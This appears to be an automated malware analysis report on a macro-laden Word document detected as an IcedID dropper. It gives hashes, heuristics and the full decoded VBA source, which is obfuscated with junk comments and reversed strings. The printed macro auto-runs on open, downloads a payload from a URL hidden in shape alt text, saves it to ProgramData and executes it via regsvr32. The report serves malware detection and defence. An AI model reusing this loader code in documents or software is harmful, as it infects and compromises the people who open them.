Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7242e1aa62b78d16…

Verdict: MALICIOUS
File type: Office (OOXML)
Size: 100.3 KB
Created: 2020-10-19 09:41:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-25
MD5: e4270855ce6f8e43d1b6b4bb1030fb25
SHA-1: 2d7a501b217c2e83a90d05a6d5f36c3f9a29d5fb
SHA-256: 7242e1aa62b78d16cc5c8a72ed5d22789f360c85c67df87b0d8db4d3f4ecc51b
Risk score: 290

Heuristics (7)

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 4 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Set SDKUr = CreateObject(REPwt + "." + "shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set DEpxX = VBA.CreateObject(fJYHb + "" + JfrJY)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL | Channel
    • http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartex | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006 | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/ink | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3d | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/math | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing | In document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/main | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cid | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symex | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroup | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInk | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordml | In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShape | In document text (OOXML body / shared strings)

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 13982 bytes
SHA-256: 71af74ce9a828a44914d6c1c504966d4a3f47d887bf73e463058e57552a497f3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "XPtmE"
Sub WMEez(TZVbA, Optional ByVal GypzO As String = "c:\programdata\PBgKx.txt", Optional ByVal JfrJY As String = "systemobject")
' Birdwatchers killings
' Vulgarity lime
' Accordions unscrewed intersections hubbub
' Aces appalled
' Unstructured clench formed
' Fledges mantelshelf apocalypse
' Evaluated condemnatory libretto
' Ramrod iraqi exclaim inhumanly
' Skulking coordinate freezer
' Carelessly pillory spat belched
' Reversed fumble haughty earldom pony
' Courtroom fluorescence
' Addle recriminate
' Reproached knob courtier intercepting
' Submersion kickstarts stator teeniest stagnated
' Enacting inscribe malformations doldrums
' Conscientious triffids fences inconstancy
' Intemperate inept militancy
' Stunt battlefield
' Sentenced knowing
' Scalable escapades millibars roadshow illtempered asters
' Blueness politeness anthrax alright plaintiffs typeface
Set DEpxX = VBA.CreateObject(fJYHb + "" + JfrJY)
' Founder therapists
' Undercarriage couturier speakers galas
' Testily neater unready
' Rear bagging remarry parental iambic lover
' Prevails downland
Set wDypC = DEpxX.CreateTextFile(GypzO)
' Orthographic rapturous ocelot intimidating adlib
' Unprofessional charming ruiner sublime baptisms lawn
' Longing wraths
' Stenches allocator vituperate limo
' Physio slovenliness asunder
' Lambent purposeless kiss values purification
' Conjugating ejected rosebuds geographer
wDypC.WriteLine TZVbA
' Tiptoed
' Stilt enrage
' Shuddering antlions midwives
' Umpteen cist
' Prior orca vibrating
' Buttoning spurred personal
' Reinstall exogenous organisation flicked cite
wDypC.Close
' Deadlier focal poplar lexicographical tempers
' Ordinal adduce calmly emulsifies
' Unclassifiable whacker prompt marinated wraiths brutality
' Dermic righthander
' Concatenates affinities geographically necrophiliacs auditing
' Pithiest silting
' Droopingly mountaineers disgorge bloodstained
' Creaks hostelries chromed chauvinistic
' Proportionately commenting exchequer
' Rehashing sojourns
' Electrocuted vitiate emotionally
' Wrongful petulance twinkle
' Brief millisecond solo decompressed
' Grammarian repudiating fealty determinism hollyhocks
' Doze upholding ombudsman translating warhorse
' Cartel unsought interleaving whereabouts conventionalist
' Geochemistry thence unfriendly restless
' Insubordinate sportsmanship cortex
' Artist annoying moleskin firearms reticent cycloid
' Tonight interpellation tinkled quantifying maths
' Alibaba swamps antithetic undiscovered legality earphones
' Undeservedly ambitious abnormality steeplejack
' Affirm importer
' Juicier chlamydia motet
' Envelopers powerful befalling invited
' Sherds decreeing throws unbowed furrier
' Lur fang divisive crawlers
' Unheroic filch shivered infelicities
' Benign commercialism
' Thousandfold row aperitifs
' Deflated mindless
' Phospholipids linage bullet
' Eg grinding algerian rebind saddling
' Luxury steer
' Gestural garbs hangars heterozygous yogi
' Hyacinth tori wasp
' Pool pingpong mongoose hurling thither bioengineering
' Tensions snorted courtyard usurpation galvanise
End Sub
' Computerliterate misreading edifice forks march
' Forgetful syntax
' Radiated cosiness
' Hieroglyphs aesthete resuscitated sceptical
' Lightheadedness empires bronzed juggernaut heavier abattoirs
Sub AutoOpen()
' Skip webs suppliant
' Cleaning overprinted rolypoly overcommitments
' Hurls carburettors evaluator integrals
' Derelict
' Evidently overdressed biasing ploys
' Darkening armchair refinance soundproofed
' Comedown
' Convulsions
' Precociously wisdoms undeclared
' Appertaining ails
' Globed hypercube grains
' Appraise chequering enigma cats
' Radical enfolding
' Camelhair headship owned toymaker busier sisterinlaw
' Cedars amphibians conducting adjustable
' Affluence remind unshaped amplification
' Censoring juggernaut throttling spaded
' Nonevent twigged
' Swathes economic wellplaced
' Lengthier historiographical protectionism silicate
' Chasms
' Comforting
' Chronically issuable lowish
' Idiotically
' Aluminium unfaithfulness clawed regimental tuition
' Paternal entirety
Dim vkQOC As New IfIHh
' Stators considerable owner cathode detected interest
' Mistranslating toenails
' Conductor openheart quantisation sparring misled
' Aerobically emasculate
' Anaesthetised scam exactitude
' Cramps downpours tweeter
' Promiscuity challenge kiev coriander
CMrju = ""
 
' Gemstones trickle fury heated sidelight ruffled molehills
' Opponents
' Strenuous wiles
' Bereaved
' Massproducing floozies degenerating yellowish
' Fuller lidded
' Singers prays obtuse merman
' Copycats cursive worn
' Inclines
' Raking impinged stovepipe
' Composers
' Childbirth ailing
' Hanggliders proforma mixed mitochondrial unkind
TZVbA = vkQOC.HqGfq(bkQTc)
' Footplate progress extenuating idealised
' Ancient northernmost gauze enjoyability
' Festival sage
' Pincushions alcohols
' Obstructiveness ukulele policy tonsil callable
' Officer bap
' Wallets pompey scouring utterance
WMEez aHBvM(TZVbA)
' Accuracies interprets aussies presupposes adulation arabesque
' Blankly accessed praiseworthy glut redeclaration
' Fling unmeasurable despots
' Geyser squinting liquor guessed autocue
' Chauvinist cyprus breathes rut passion veldt misprinting
' Interruptibility rotunda
' Sydney demonstrative ridiculed eg scrapers
' Muzak charter cybernetics backless remand faxed
' Pickle stingier charitable
' Pirouettes
' Wildness velodrome
' Unreformed jar bandstand scimitar ghostlike
MILHj fsxAY(0) + "vr32 c:\programdata\PBgKx.txt", "wscript"
End Sub
Function Tilhj(gBTuI, EzWXj)
' Rating intimate ignorantly
' Powering cased
' Hornpipes illiterates outpace governs spartans probabilistically
' Ransoms
' Lettering sagged mulled snug
Tilhj = Split(gBTuI, EzWXj)
End Function

Attribute VB_Name = "igdAD"
' Dreamland disconnections philological uninspired subprograms
' Longitudinal aneurysms
' Tug interceptor villainy
' Dining cannabis virginity carpeted cherubic
' Entrancing drinkers
' Selfrighteousness
' Sauntering storeman smooth
' Glaringly intruders afar uncharacteristic gregarious
Function aHBvM(IAkmO)
' Hideandseek punchcard inductive spiked
' Unsalted enforcements pickings outflank congratulating
' Conflagration
' Orderings adjourns marinas columbus
' Uneven tranquilly
aHBvM = StrConv(IAkmO, vbUnicode)
' Bacilli
' Damsons deluge overloads
' Sad enervate trusses hark
' Widths foreshadowing bulgaria apotheosis runny harpsichords
End Function
' Damaging hider parents
' Commanded
' Soundless ponderously
' Retrospectives donjuan interferer
Function BBwPl()
' Park trikes
' Duty dyke spoke notoriety
' Enroll outmanoeuvre depreciating
' Concreted
' Vims
' Backers overspill initialled
' Defiles pretentiously photographs ennoble
' Onlybegotten
' Briefcases miraculously nympholepsy gesturing gentians
' Adolescent caption turkish pinups spurns
' Eider middling
' Serology stigmatise eccentricities
' Insuperable block figural conditioning shuns linens
' Polychromatic loophole selfishly
With ActiveDocument.shapes(1)
BBwPl = .AlternativeText
End With
End Function
' Ambivalence humpback annul rapturously prosodic apprehends
' Denotation crossbar
' Monographic unsmooth
' Theoretic
' Boasts stretcher watching slipup discharges rome slip absurd
Function fsxAY(fxUzo)
' Balaclava reformulate auditions fanciful
' Mistime behaviourism reloading
' Whippet monstrous abuser hospital
' Sportive vocations
' Liquify inauthenticity dolorous burlier
' Detections wapiti
' Pestilential refreshed erroneously whereby borrower
' Drooling sonorously
' Photolytic libya ibex
' Terry breaches airflow
' Comments excited immunology
' Grandest coma raccoons
wuMkw = Tilhj(BBwPl(), "~~~")
qscyG = wuMkw(fxUzo)
fsxAY = qscyG
End Function

Attribute VB_Name = "IfIHh"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function gSzet(NWNsm, lSuCC, aRHAi)
' Pacifism transcriptions imbecile creatures unkindness
' Bogy upkeep betrayals
' Lung switched smelled
' Doges contributors broadleaved sublunary palmtop
' Southward excusable
gSzet = Mid(NWNsm, lSuCC, aRHAi)
End Function
Public Function ObyTP(zVmvq, PdIsX)
' Describer
' Disrupted suffers vegetational
' Lifestyles
' Candidly
' Collaborators disassembler
' Safest dismounted
' Glutinous sliders scurryings supercilious
' Unrepentant crumpets exhibiting
' Malaise republication shilling
' Betraying scrolling precaution
' Belts roughens speechifying agility
' Numerological proportionately achievements duomo
' Timescales rebury beseeching
' Ochres
' Teenagers spree asphyxiated emphasise
' Epigones candle kneeling pavilion
FdLNj = Trim(zVmvq)
For DwixC = PdIsX To Len(FdLNj)
WeJdS = gSzet(FdLNj, DwixC, PdIsX) & WeJdS
Next DwixC
ObyTP = WeJdS
End Function
' Buoyed saddlebags turnstiles stockpiling
' Grassroots pocked
' Slums clench daydreaming throwback belong
' Wizard scapula annexe acquits
' Coquettishly anaemia videophone mechanicals
Function HqGfq(XyFjm)
' Literally allocated
' Dally underlining chronicling quantisation
' Gobbler federation esthetic laryngitis walled
' Loaders spectacularly persecutors linearised newsman hecklers
' Remanded flushed introspection awed
' Green
Dim hwUhf As Object
' Assiduous ninefold
' Powdery mouldings workhouse soandso
' Freeholders forester riflemen regresses expectorated lettering
' Fecund kremlin lionised interpreted
' Dazing overthrew
' Spires unfairness amenable contends crenellations
' Froggy rashes silliest
' Philological jews
' Scoreboard developing monition muffling
Set hwUhf = CreateObject(ObyTP(XyFjm, 1) + "." + ObyTP(XyFjm, 1) + "Request.5.1")
' Halt pedology runaway casters biophysical hundredfold
' Assuaging springbok bored ligatures bashful bagfuls
' Bounties vocative mercuric choreographer
' Chronicles ethnical readapt
' Formulator
' Ding upland seriously
' Welleducated boats reclamations
' Repel decriminalising
' Levering
' Stellar fright idles nutty embargo tolbooth useless
' Winningly majestically
' Coder sternly punishes revolved scaffolds limber
' Sevenpence ecuador
' Unemployable dryish charger discussion
' Juiciest wobbler geraniums heavings pattering
' Togo umpteenth rafts lunate
' Monotheist rostering calcutta sash
' Tapped compatibles avalanche walkabouts
' Thrum byte atheistically jasmine pears unformed sanctity
zhXlP = fsxAY(1)
' Deliverers duckbill spaded ambitions
' Cosy situating trials particularity bang
' Appointment extends promiscuously devised adequately
' Wicks huddled victualling interpreting enrolment
hwUhf.Open "GET", ObyTP(zhXlP, 1), False
' Structured asterisk sprouts
' Sterilisations mystique
' Anterior decaffeinated goers softspoken itched
' Bowls intelligibly vindictive scheduler
' Blindfolded capitulating softened
' Fruited reactionary
' Mellifluously collide
hwUhf.Send
' Suffocating hare safaris
' Gymnastics hatchway pieces filings goatskin obsessing
' Solutes ransoming electrifying contriving ridicules beguile springboks total
' Handguns
HqGfq = hwUhf.responsebody
End Function

Attribute VB_Name = "TOFkI"
Public Const bkQTc As String = "ptthniw"
Public Const fJYHb As String = "scripting.file"
Sub MILHj(LZQZy, REPwt)
' Nonetheless resolved geocentric hammerhead shellfish padded
' Scoops pantaloons extol disagreements
' Criticised staphylococcus hours scudding
' Fleas equitably dwarfish
' Abdomen hayfever
' Upmost malformation ambler fluorocarbon
' Appertaining democratic transformed
Set SDKUr = CreateObject(REPwt + "." + "shell")
' Intensifying woolly
' Harder
' Mocker manse
' Pools buckets disabling
' Shields electrocute redistributive glossed phlogiston
' Treats reasonably neighbourhood possessiveness
' Aspersion linchpin murk
' Reconverted compliant practitioners sideshow
' Tracksuit tariff daze clamped seriousness
' Overdoing bulged flinging strangers refuting
' Flirts assure
' Walkway parachute
' Wormholes glimpsing
' Falsifiable
' Burdened
' Aircrew stabilises pantry
' Annexing divans imperfectly
' Determinacy pulpy wagged
' Fictions motlier stomps laundress
' Redcross sublime
' Nitric unpalatable crystallised roosted
' Dormouse
' Stealer mafiosi lathers unemployed run
' Snowdrop useless submergence
' Swashbuckling access reincarnated
' Armbands excuse explicable
' Condolence parsings
' Spheroid corporals tropopause
' Preheat ruefully
' Passageway odour augurs gravitas
' Swaying brawniest graduates migrated redraft
' Thickset frisks beaten
' Puling pessimistic jarl waterway dispatched
' Demarcate reduces coordination adapted
' Imprisoning evaluated
' Mistyping
' Girded fretless colitis poled earring
' Outrage foams relapsed soudan noisiness idol recollected staplers
' Resend
' Stunning profiling judgments acceptances
' Horsewhip compatriots austere
' Abolished anticipate busting curtailing urbanity
' Shingle agouti
' Stomp pause
' Inhumane headmistresses
' Admin absolved sensed curfew cadge
' Sort conspiring safeguards
' Fondue corrupt
' Shell amniotic ramped
Call SDKUr.exec(LZQZy)
' Unassailable
' Spleen tramlines diarrhoeal disinfection imbeds
' Diffusional lifesize aflame managing gardening
' Locale oscar chirps
' Worth fusible preceding like
End Sub
vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 49664 bytes
SHA-256: 6d4181e1a6d6dea66a33f40b9b066d4c6b01f90a3dd304dafe2bb4f0d8323d7b
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely